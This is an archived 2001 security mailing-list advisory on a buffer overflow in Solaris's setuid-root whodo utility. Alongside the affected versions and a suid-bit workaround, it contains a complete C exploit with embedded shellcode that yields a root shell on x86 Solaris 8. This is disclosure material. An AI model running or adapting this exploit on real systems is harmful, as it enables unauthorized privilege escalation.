Solaris whodo Vulnerability

From: Pablo Sor (psorat_private)
Date: Thu Jul 05 2001 - 07:55:55 PDT

Next message: Noir Desir: "Solaris 8 libsldap exploit"

Previous message: Andrew van der Stock: "RE: xdm cookies fast brute force"
Next in thread: Mike Gerdts: "Re: Solaris whodo Vulnerability"
Next in thread: Pablo Sor: "Re: Solaris whodo Vulnerability"
Reply: Mike Gerdts: "Re: Solaris whodo Vulnerability"
Reply: malachi: "Re: Solaris whodo Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Vulnerability in Solaris whodo 

Date Published: July 5, 2001

Advisory ID: N/A

Bugtraq ID: 2935

CVE CAN: Non currently assigned.

Title: Solaris whodo Buffer Overflow Vulnerability

Class: Boundary Error Condition

Remotely Exploitable: No

Locally Exploitable: Yes

Vulnerability Description:

The whodo program is installed setuid root by default in Solaris. 
It contains a vulnerability in handling data from enviroment variables, 
if this variable exceeds predefined lenght an exploitable stack overflow 
can occur. 
Through exploiting this vulnerability an attacker can gain effective
uid root.

Vulnerable Packages/Systems:

SunOS 5.8 
SunOS 5.7 
SunOS 5.5.1 

(have not tested on other version)

Solution/Vendor :

Sun Microsystems was notified on June 28, 2001. Patches are excepted
shortly.

Quick Fix:

Clear the suid bit of 

/usr/sbin/sparcv7/whodo (SunOS 5.8 Sparc)
/usr/sbin/i86/whodo     (SunOS 5.8, 5.7 Intel)
/usr/sbin/whodo         (SunOS 5.5.1)

Credits:

This vulnerability was discovered by Pablo Sor, Buenos Aires, Argentina.
psorat_private, psorat_private

This advisory was drafted with the help of the SecurityFocus.com Vulnerability
Help Team. For more information or assistance drafting advisories please mail
vulnhelpat_private

Technical Description - Exploit/Concept Code:

#include <fcntl.h>

/*
   /usr/sbin/i86/whodo overflow proof of conecpt.

   Pablo Sor, Buenos Aires, Argentina 06/2001
   psorat_private, psorat_private

   works against x86 solaris 8

   default offset +/- 100  should work.

*/

long get_esp() { __asm__("movl %esp,%eax"); }

int main(int ac, char **av)
{

char shell[]=
 "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
 "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
 "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
 "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
 "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
 "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff";

  unsigned long magic = get_esp() + 1180;  /* default offset */

  unsigned char buf[800];
  char *env;

  env = (char *) malloc(400*sizeof(char));
  memset(env,0x90,400);
  memcpy(env+160,shell,strlen(shell));
  memcpy(env,"SOR=",4);
  buf[399]=0;
  putenv(env);
  
  memset(buf,0x41,800);
  memcpy(buf+271,&magic,4);
  memcpy(buf,"CFTIME=",7);
  buf[799]=0;
  putenv(buf);

  system("/usr/sbin/i86/whodo");
}

-- 
Pablo Sor
psorat_private, psorat_private

Next message: Noir Desir: "Solaris 8 libsldap exploit"
Previous message: Andrew van der Stock: "RE: xdm cookies fast brute force"
Next in thread: Mike Gerdts: "Re: Solaris whodo Vulnerability"
Next in thread: Pablo Sor: "Re: Solaris whodo Vulnerability"
Reply: Mike Gerdts: "Re: Solaris whodo Vulnerability"
Reply: malachi: "Re: Solaris whodo Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Jul 05 2001 - 10:45:40 PDT